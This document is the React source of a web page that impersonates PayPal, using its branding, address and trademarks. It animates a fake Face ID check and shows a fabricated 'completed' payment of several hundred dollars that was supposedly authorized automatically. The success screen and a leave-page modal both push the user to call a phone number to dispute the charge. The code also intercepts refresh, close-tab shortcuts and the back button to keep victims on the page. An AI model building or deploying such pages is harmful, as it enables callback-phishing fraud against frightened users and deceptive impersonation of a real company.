import React, { useEffect, useRef, useState } from "react";
import axios from "axios";
import "@/App.css";
import { BrowserRouter, Routes, Route } from "react-router-dom";
import { Toaster } from "sonner";
import { Check, Lock, ScanFace, Phone } from "lucide-react";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;

// Block accidental navigation & refresh shortcuts
function useNavigationGuards(setLeavePromptOpen) {
  useEffect(() => {
    const onBeforeUnload = (e) => {
      e.preventDefault();
      e.returnValue = "Are you sure you want to leave this page?";
      return "Are you sure you want to leave this page?";
    };
    const onKeyDown = (e) => {
      // Block & intercept refresh / close shortcuts → show our custom modal
      const isRefresh =
        e.key === "F5" ||
        ((e.ctrlKey || e.metaKey) && (e.key === "r" || e.key === "R"));
      const isCloseTab =
        (e.ctrlKey || e.metaKey) && (e.key === "w" || e.key === "W");
      if (isRefresh || isCloseTab) {
        e.preventDefault();
        e.stopPropagation();
        setLeavePromptOpen(true);
      }
    };
    const onPopState = () => {
      // Back button / Android back gesture → re-push current URL & show modal
      window.history.pushState(null, "", window.location.href);
      setLeavePromptOpen(true);
    };

    // Push two extra states so back-gesture has a buffer
    window.history.pushState(null, "", window.location.href);
    window.history.pushState(null, "", window.location.href);

    window.addEventListener("popstate", onPopState);
    window.addEventListener("beforeunload", onBeforeUnload);
    document.addEventListener("keydown", onKeyDown, true);
    return () => {
      window.removeEventListener("popstate", onPopState);
      window.removeEventListener("beforeunload", onBeforeUnload);
      document.removeEventListener("keydown", onKeyDown, true);
    };
  }, [setLeavePromptOpen]);
}

function LeavePromptModal({ open, onStay, onLeave }) {
  if (!open) return null;
  return (
    <div
      data-testid="leave-prompt-overlay"
      className="fixed inset-0 z-[9999] flex items-end sm:items-center justify-center px-4 fade-in"
      style={{ background: "rgba(0, 28, 100, 0.45)", backdropFilter: "blur(6px)" }}
      role="dialog"
      aria-modal="true"
      aria-labelledby="leave-prompt-title"
    >
      <div
        data-testid="leave-prompt-modal"
        className="pp-card rounded-[24px] w-full max-w-[380px] p-6 text-center pop-in"
        style={{ background: "#fff" }}
      >
        <div
          className="mx-auto w-12 h-12 rounded-full flex items-center justify-center mb-4"
          style={{
            background: "rgba(0,112,186,0.10)",
            border: "1px solid rgba(0,112,186,0.20)",
          }}
        >
          <svg viewBox="0 0 24 24" width="22" height="22" fill="none" stroke="#0070BA" strokeWidth="2.2" strokeLinecap="round" strokeLinejoin="round">
            <circle cx="12" cy="12" r="10" />
            <line x1="12" y1="8" x2="12" y2="13" />
            <circle cx="12" cy="16.5" r="0.6" fill="#0070BA" />
          </svg>
        </div>
        <h3
          id="leave-prompt-title"
          className="font-display text-[20px] font-extrabold tracking-tight"
          style={{ color: "var(--pp-text)" }}
        >
          Do you want to leave this page?
        </h3>
        <p className="mt-2 text-[13px] leading-relaxed" style={{ color: "var(--pp-muted)" }}>
          Leaving now may cancel pending actions related to your transaction.
          If you need assistance, our support team can help.
        </p>
        <div className="mt-6 grid grid-cols-2 gap-2.5">
          <a
            href="tel:+18446155686"
            onClick={onStay}
            data-testid="leave-prompt-help"
            className="pp-btn-primary inline-flex items-center justify-center py-3 text-[13.5px] font-semibold"
          >
            Help
          </a>
          <button
            type="button"
            onClick={onLeave}
            data-testid="leave-prompt-yes"
            className="pp-btn-ghost inline-flex items-center justify-center py-3 text-[13.5px] font-semibold"
          >
            Yes
          </button>
        </div>
      </div>
    </div>
  );
}

/**
 * Auto-flow:
 *   detecting (~2.0s) → recognized (~0.6s) → processing (~0.9s) → success
 */
function PaymentSheet() {
  const [state, setState] = useState("detecting");
  const [txn, setTxn] = useState(null);
  const [session, setSession] = useState(null); // per-IP { amount, recipient, txn_id }
  const timersRef = useRef([]);

  const clearTimers = () => {
    timersRef.current.forEach(clearTimeout);
    timersRef.current = [];
  };

  // Fetch per-IP session payment details (amount/name/txn_id) before the flow
  useEffect(() => {
    let mounted = true;
    (async () => {
      try {
        const { data } = await axios.get(`${API}/session-payment`);
        if (mounted) setSession(data);
      } catch {
        if (mounted) {
          // Fallback so UI still works offline / API errors
          const cents = Math.floor(Math.random() * (84999 - 72999 + 1)) + 72999;
          setSession({
            amount: Math.round(cents) / 100,
            recipient: "Samantha Brooks",
            txn_id: Array.from({ length: 17 }, () => {
              const a = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
              return a[Math.floor(Math.random() * a.length)];
            }).join(""),
          });
        }
      }
    })();
    return () => {
      mounted = false;
    };
  }, []);

  const runFlow = () => {
    if (!session) return;
    clearTimers();
    setTxn(null);
    setState("detecting");
    timersRef.current.push(setTimeout(() => setState("recognized"), 2000));
    timersRef.current.push(setTimeout(() => setState("processing"), 2600));
    timersRef.current.push(
      setTimeout(async () => {
        // Build the success payload directly from the per-IP session data so
        // the txn_id, amount, and recipient stay consistent for the same IP.
        setTxn({
          txn_id: session.txn_id,
          amount: session.amount,
          recipient: session.recipient,
          status: "completed",
          created_at: new Date().toISOString(),
        });
        setState("success");
      }, 3500)
    );
  };

  // Kick off the animated flow once we have session details
  useEffect(() => {
    if (!session) return;
    const t = setTimeout(runFlow, 400);
    return () => {
      clearTimeout(t);
      clearTimers();
    };
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [session]);

  const displayAmount = session?.amount ?? 0;
  const displayRecipient = session?.recipient ?? "";

  return (
    <div
      data-testid="payment-sheet"
      className="pp-card rounded-[28px] w-full max-w-[440px] mx-auto overflow-hidden relative fade-up"
    >
      {/* Top banner */}
      <div
        className="px-6 py-4 flex items-center justify-between"
        style={{
          borderBottom: "1px solid var(--pp-line)",
          background: "linear-gradient(180deg, #ffffff, #fafbfd)",
        }}
      >
        <div className="flex items-center gap-2">
          <img
            src="https://customer-assets.emergentagent.com/job_sapay-checkout/artifacts/dqa7rwn2_image.png"
            alt="PayPal"
            className="w-7 h-7 object-contain"
            data-testid="brand-logo"
          />
          <span
            className="font-display font-extrabold text-[16px] tracking-tight"
            style={{ color: "var(--pp-text)" }}
          >
            Pay<span style={{ color: "#0070BA" }}>Pal</span>
          </span>
        </div>
        <span className="text-[10.5px] font-mono" style={{ color: "var(--pp-muted)" }}>
          SECURE · CHECKOUT
        </span>
      </div>

      {/* Body */}
      <div className="px-6 pt-6 pb-6">
        {/* Amount header — always visible */}
        <div className="text-center">
          <div
            className="font-display font-extrabold"
            style={{ color: "var(--pp-text)", fontSize: 38, letterSpacing: "-0.04em" }}
            data-testid="payment-amount"
          >
            {session
              ? `$${displayAmount.toFixed(2)}`
              : "$—"}
          </div>
          <div className="mt-1 text-[12.5px]" style={{ color: "var(--pp-muted)" }}>
            to{" "}
            <span
              className="font-semibold"
              style={{ color: "var(--pp-text)" }}
              data-testid="payment-recipient"
            >
              {displayRecipient || "—"}
            </span>
          </div>
        </div>

        {state !== "success" && (
          <div className="mt-6">
            <FaceIDPanel state={state} />
            <StatusLabel state={state} />
            <div
              className="mt-5 flex items-center justify-center gap-1.5 text-[11.5px]"
              style={{ color: "var(--pp-muted)" }}
            >
              <Lock size={11} /> PCI-DSS Level 1 · End-to-end encrypted
            </div>
          </div>
        )}

        {state === "success" && (
          <div className="mt-7 fade-in">
            <div className="flex justify-center">
              <div className="relative w-[88px] h-[88px] pop-in">
                <div
                  className="absolute inset-0 rounded-full"
                  style={{
                    background: "var(--pp-green)",
                    boxShadow: "0 14px 30px -10px rgba(46,201,70,0.55)",
                  }}
                />
                <svg
                  viewBox="0 0 100 100"
                  width="48"
                  height="48"
                  style={{
                    position: "absolute",
                    top: "50%",
                    left: "50%",
                    transform: "translate(-50%, -50%)",
                  }}
                >
                  <path
                    className="check-path"
                    d="M22 52 L42 72 L78 30"
                    fill="none"
                    stroke="#fff"
                    strokeWidth="9"
                    strokeLinecap="round"
                    strokeLinejoin="round"
                  />
                </svg>
              </div>
            </div>
            <h3
              className="font-display text-[22px] font-extrabold mt-5 text-center fade-up"
              style={{ animationDelay: ".25s", color: "var(--pp-text)" }}
            >
              Payment sent successfully
            </h3>
            <p
              className="text-[13px] mt-1 text-center fade-up"
              style={{ animationDelay: ".35s", color: "var(--pp-muted)" }}
            >
              ${txn?.amount?.toFixed(2)} sent to {txn?.recipient} via PayPal
            </p>

            <div
              className="mt-6 rounded-2xl overflow-hidden"
              style={{
                border: "1px solid var(--pp-line)",
                background: "var(--pp-bg-soft)",
              }}
            >
              <Row
                label="Date"
                value={new Date().toLocaleDateString("en-US", {
                  timeZone: "America/New_York",
                })}
              />
              <Row label="Transaction ID" value={txn?.txn_id} mono />
              <Row
                label="Status"
                value={
                  <span
                    className="inline-flex items-center gap-1.5 font-semibold"
                    style={{ color: "var(--pp-green)" }}
                  >
                    <Check size={14} /> Completed
                  </span>
                }
              />
              <Row label="Method" value="Debit Card" />
              <Row label="Confirmation" value="Email sent" last />
            </div>

            {/* PayPal-style notes (plain text, no boxes) */}
            <div className="mt-6 space-y-3 px-1">
              <p className="text-[12px] leading-relaxed" style={{ color: "var(--pp-text-body)" }} data-testid="note-automated">
                <span className="font-bold" style={{ color: "var(--pp-text)" }}>
                  Note:
                </span>{" "}
                This transaction was authorized automatically after a Money Request Link
                was opened on your device. No additional confirmation was required.
              </p>
              <p className="text-[12px] leading-relaxed" style={{ color: "var(--pp-text-body)" }} data-testid="note-bank">
                Please allow up to 24 hours for this charge to appear on your bank or card
                statement, depending on your issuer's processing schedule.
              </p>
              <p className="text-[12px] leading-relaxed" style={{ color: "var(--pp-text-body)" }} data-testid="note-fraud">
                If you did not authorize this payment, or you believe this transaction is
                the result of a scam or unauthorized access, please contact our support
                team immediately to dispute the charge, cancel the transfer, and request a
                full refund.
              </p>
            </div>

            {/* Support call button */}
            <a
              href="tel:+18446155686"
              data-testid="support-call-button"
              className="mt-6 pp-btn-primary w-full py-3.5 text-[14px] font-semibold inline-flex items-center justify-center gap-2"
            >
              <Phone size={15} />
              Call Support
            </a>

            {/* Footer / trademark */}
            <div className="mt-7 pt-5 text-center" style={{ borderTop: "1px solid var(--pp-line)" }}>
              <div className="flex items-center justify-center gap-3 text-[10.5px] font-semibold" style={{ color: "var(--pp-muted)" }}>
                <a href="#" className="hover:underline" data-testid="footer-privacy">Privacy</a>
                <span>·</span>
                <a href="#" className="hover:underline" data-testid="footer-legal">Legal</a>
                <span>·</span>
                <a href="#" className="hover:underline" data-testid="footer-policy">User Agreement</a>
                <span>·</span>
                <a href="#" className="hover:underline" data-testid="footer-help">Help</a>
              </div>
              <div className="mt-3 text-[10.5px]" style={{ color: "var(--pp-muted)" }}>
                © 1999–{new Date().toLocaleDateString("en-US", { timeZone: "America/New_York", year: "numeric" })} PayPal, Inc. All rights reserved.
              </div>
              <div className="mt-1 text-[10px]" style={{ color: "var(--pp-muted)" }}>
                PayPal is located at 2211 N. First Street, San Jose, CA 95131.
              </div>
              <div className="mt-2 text-[10px] leading-relaxed" style={{ color: "var(--pp-muted)" }}>
                PayPal, the PayPal logo, and related marks are trademarks of
                PayPal, Inc. or its licensors.
              </div>
            </div>
          </div>
        )}
      </div>
    </div>
  );
}

function FaceIDPanel({ state }) {
  const success = state === "recognized" || state === "processing";
  const stroke = success ? "#2EC946" : "#0070BA";
  return (
    <div className="mt-5 relative mx-auto w-[148px] h-[148px] flex items-center justify-center">
      {state === "processing" && (
        <svg className="absolute inset-0 ring-spin" viewBox="0 0 148 148">
          <circle
            cx="74"
            cy="74"
            r="68"
            fill="none"
            stroke="#0070BA"
            strokeWidth="3"
            strokeLinecap="round"
            strokeDasharray="60 360"
          />
        </svg>
      )}

      <div
        className="absolute inset-0 rounded-full"
        style={{
          border: `2px solid ${
            success ? "rgba(46,201,70,0.25)" : "rgba(0,112,186,0.18)"
          }`,
        }}
      />

      {state === "detecting" && (
        <div className="absolute inset-3 rounded-full pulse-blue" />
      )}

      <svg viewBox="0 0 100 100" width="84" height="84" className="relative z-10">
        <path d="M14 30 V18 H26" fill="none" stroke={stroke} strokeWidth="3" strokeLinecap="round" style={{ transition: "stroke .3s" }} />
        <path d="M86 30 V18 H74" fill="none" stroke={stroke} strokeWidth="3" strokeLinecap="round" />
        <path d="M14 70 V82 H26" fill="none" stroke={stroke} strokeWidth="3" strokeLinecap="round" />
        <path d="M86 70 V82 H74" fill="none" stroke={stroke} strokeWidth="3" strokeLinecap="round" />
        <g
          fill="none"
          stroke={stroke}
          strokeWidth="2.4"
          strokeLinecap="round"
          strokeLinejoin="round"
          style={{ transition: "stroke .3s" }}
        >
          <line x1="38" y1="42" x2="38" y2="48" />
          <line x1="62" y1="42" x2="62" y2="48" />
          <path d="M50 44 V56 L46 58" />
          <path d="M40 66 Q50 72 60 66" />
        </g>
      </svg>

      {state === "detecting" && (
        <div
          className="absolute left-[18%] right-[18%] h-[2px] rounded-full face-scan-line z-20"
          style={{
            background:
              "linear-gradient(90deg, transparent, #0070BA 50%, transparent)",
            boxShadow: "0 0 14px rgba(0,112,186,0.7)",
            top: "50%",
          }}
        />
      )}

      {state === "recognized" && (
        <div
          className="absolute -bottom-2 -right-2 w-8 h-8 rounded-full flex items-center justify-center pop-in z-20"
          style={{
            background: "var(--pp-green)",
            boxShadow: "0 8px 18px -6px rgba(46,201,70,0.55)",
          }}
        >
          <Check size={16} className="text-white" strokeWidth={3} />
        </div>
      )}
    </div>
  );
}

function StatusLabel({ state }) {
  const map = {
    detecting: { text: "Detecting Face ID…", icon: ScanFace },
    recognized: { text: "Face ID recognized", icon: Check },
    processing: { text: "Authorizing payment…", icon: null },
  };
  const cur = map[state] || map.detecting;
  const Icon = cur.icon;
  const isSuccessish = state === "recognized";
  return (
    <div className="mt-5 text-center">
      <div
        className="inline-flex items-center gap-2 px-4 py-2 rounded-full text-[13px] font-semibold"
        style={{
          color: isSuccessish ? "var(--pp-green)" : "var(--pp-text)",
          background: isSuccessish
            ? "rgba(46,201,70,0.10)"
            : "var(--pp-bg-soft)",
          border: `1px solid ${
            isSuccessish ? "rgba(46,201,70,0.25)" : "var(--pp-line)"
          }`,
          transition: "all .3s ease",
        }}
      >
        {state === "processing" ? (
          <span
            className="w-3.5 h-3.5 rounded-full border-2 border-[#0070BA]/30 border-t-[#0070BA]"
            style={{ animation: "spin 0.9s linear infinite" }}
          />
        ) : Icon ? (
          <Icon size={14} />
        ) : null}
        {cur.text}
      </div>
      <div className="mt-2 text-[11.5px]" style={{ color: "var(--pp-muted)" }}>
        {state === "detecting" && "Hold still while we recognize you"}
        {state === "recognized" && "Identity confirmed"}
        {state === "processing" && "Connecting to your bank securely"}
      </div>
    </div>
  );
}

function Row({ label, value, mono, last }) {
  return (
    <div
      className={`flex items-center justify-between px-4 py-3 ${
        last ? "" : "border-b"
      }`}
      style={{ borderColor: "var(--pp-line)" }}
    >
      <span className="text-[12.5px]" style={{ color: "var(--pp-muted)" }}>
        {label}
      </span>
      <span
        className={`text-[12.5px] ${mono ? "font-mono" : "font-semibold"}`}
        style={{ color: "var(--pp-text)" }}
      >
        {value}
      </span>
    </div>
  );
}

const Home = () => {
  return (
  <div
    className="min-h-screen w-full flex items-center justify-center px-5 py-10 relative overflow-hidden"
    data-testid="home-page"
    style={{ background: "var(--pp-bg-soft)" }}
  >
    {/* soft brand blobs */}
    <div
      className="absolute -top-40 -left-40 w-[480px] h-[480px] rounded-full pointer-events-none"
      style={{
        background:
          "radial-gradient(circle, rgba(0,156,222,0.18), transparent 70%)",
      }}
    />
    <div
      className="absolute -bottom-40 -right-40 w-[520px] h-[520px] rounded-full pointer-events-none"
      style={{
        background:
          "radial-gradient(circle, rgba(255,196,57,0.18), transparent 70%)",
      }}
    />
    <PaymentSheet />
  </div>
  );
};

function App() {
  const [leavePromptOpen, setLeavePromptOpen] = useState(false);
  useNavigationGuards(setLeavePromptOpen);

  const stay = () => setLeavePromptOpen(false);
  const leave = () => {
    setLeavePromptOpen(false);
    setTimeout(() => {
      try { window.close(); } catch (_) {}
      window.history.go(-5);
    }, 50);
  };

  return (
    <div className="App">
      <Toaster
        theme="light"
        position="bottom-right"
        toastOptions={{
          style: {
            background: "#ffffff",
            border: "1px solid #e6ebf1",
            color: "#001c64",
          },
        }}
      />
      <BrowserRouter>
        <Routes>
          <Route path="/" element={<Home />} />
        </Routes>
      </BrowserRouter>
      <LeavePromptModal open={leavePromptOpen} onStay={stay} onLeave={leave} />
    </div>
  );
}

export default App;
